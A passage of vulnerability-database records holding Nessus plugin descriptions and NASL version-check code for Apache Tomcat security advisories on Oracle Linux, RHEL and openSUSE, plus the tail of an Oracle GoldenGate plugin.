script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:goldengate_application_adapters\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_goldengate_for_big_data_installed.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/Oracle GoldenGate for Big Data\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\n// Paranoid because the detection is looking for the presence of JAR files. It's possible that the customer has JAR\n// files from outdated versions on their system, but is not currently using them.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = 'Oracle GoldenGate for Big Data';\napp_info = vcf::get_app_info(app:app_name);\n\nconstraints = [\n { 'min_version':'12.2.0.1', 'fixed_version':'12.2.0.1.10' },\n { 'min_version':'12.3.1.1', 'fixed_version':'12.3.1.1.6' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-10T18:03:04", "description": "The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2019-2205 advisory.\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. 
(CVE-2018-8014)\n\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. (CVE-2018-8034)\n\n - The URL pattern of (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied.\n This could have exposed resources to users who were not authorised to access them. 
(CVE-2018-1305)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-07T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : tomcat (ELSA-2019-2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2023-09-07T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:tomcat", "p-cpe:/a:oracle:linux:tomcat-admin-webapps", "p-cpe:/a:oracle:linux:tomcat-docs-webapp", "p-cpe:/a:oracle:linux:tomcat-el-2.2-api", "p-cpe:/a:oracle:linux:tomcat-javadoc", "p-cpe:/a:oracle:linux:tomcat-jsp-2.2-api", "p-cpe:/a:oracle:linux:tomcat-jsvc", "p-cpe:/a:oracle:linux:tomcat-lib", "p-cpe:/a:oracle:linux:tomcat-servlet-3.0-api", "p-cpe:/a:oracle:linux:tomcat-webapps"], "id": "ORACLELINUX_ELSA-2019-2205.NASL", "href": "https://www.tenable.com/plugins/nessus/180856", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-2205.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(180856);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/07\");\n\n script_cve_id(\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\",\n \"CVE-2018-8034\"\n );\n script_xref(name:\"IAVB\", value:\"2018-B-0028-S\");\n script_xref(name:\"IAVB\", value:\"2018-B-0080-S\");\n script_xref(name:\"IAVB\", value:\"2018-B-0095-S\");\n\n script_name(english:\"Oracle Linux 7 : tomcat (ELSA-2019-2205)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced 
in the\nELSA-2019-2205 advisory.\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have configured it appropriately for their environment rather\n than using it in the default configuration. Therefore, it is expected that most users will not be impacted\n by this issue. (CVE-2018-8014)\n\n - The host name verification when using TLS with the WebSocket client was missing. It is now enabled by\n default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n 7.0.35 to 7.0.88. (CVE-2018-8034)\n\n - The URL pattern of (the empty string) which exactly maps to the context root was not correctly handled\n in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as\n part of a security constraint definition. This caused the constraint to be ignored. It was, therefore,\n possible for unauthorised users to gain access to web application resources that should have been\n protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\n - Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to\n 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because\n security constraints defined in this way apply to the URL pattern and any URLs below that point, it was\n possible - depending on the order Servlets were loaded - for some security constraints not to be applied.\n This could have exposed resources to users who were not authorised to access them. 
(CVE-2018-1305)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2019-2205.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar pkgs = [\n {'reference':'tomcat-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-admin-webapps-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-docs-webapp-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-el-2.2-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-javadoc-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-jsp-2.2-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-jsvc-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-lib-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-servlet-3.0-api-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'tomcat-webapps-7.0.76-9.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if 
(!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:26:49", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.", "cvss3": {}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "RHEL 7 : tomcat (RHSA-2019:2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-01-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat", "p-cpe:/a:redhat:enterprise_linux:tomcat-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat-webapps", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-2205.NASL", "href": 
"https://www.tenable.com/plugins/nessus/127697", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2205. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127697);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/06\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:2205\");\n\n script_name(english:\"RHEL 7 : tomcat (RHSA-2019:2205)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security\nconstraints can lead to unintended exposure of resources\n(CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to\nresource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:2205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8034\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script 
is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:2205\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:41:32", "description": "This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handling of overflow in the UTF-8 decoder with supplementary characters could have led to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. 
An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#Tomcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2018-10-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2018-1129)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-1129.NASL", "href": "https://www.tenable.com/plugins/nessus/117983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1129.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117983);\n script_version(\"1.3\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2018-1129)\");\n script_summary(english:\"Check for the openSUSE-2018-1129 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. 
This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during\n update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at\n http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T\n omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n # http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#Tomcat_9.0.10_(markt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8887ec3f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n 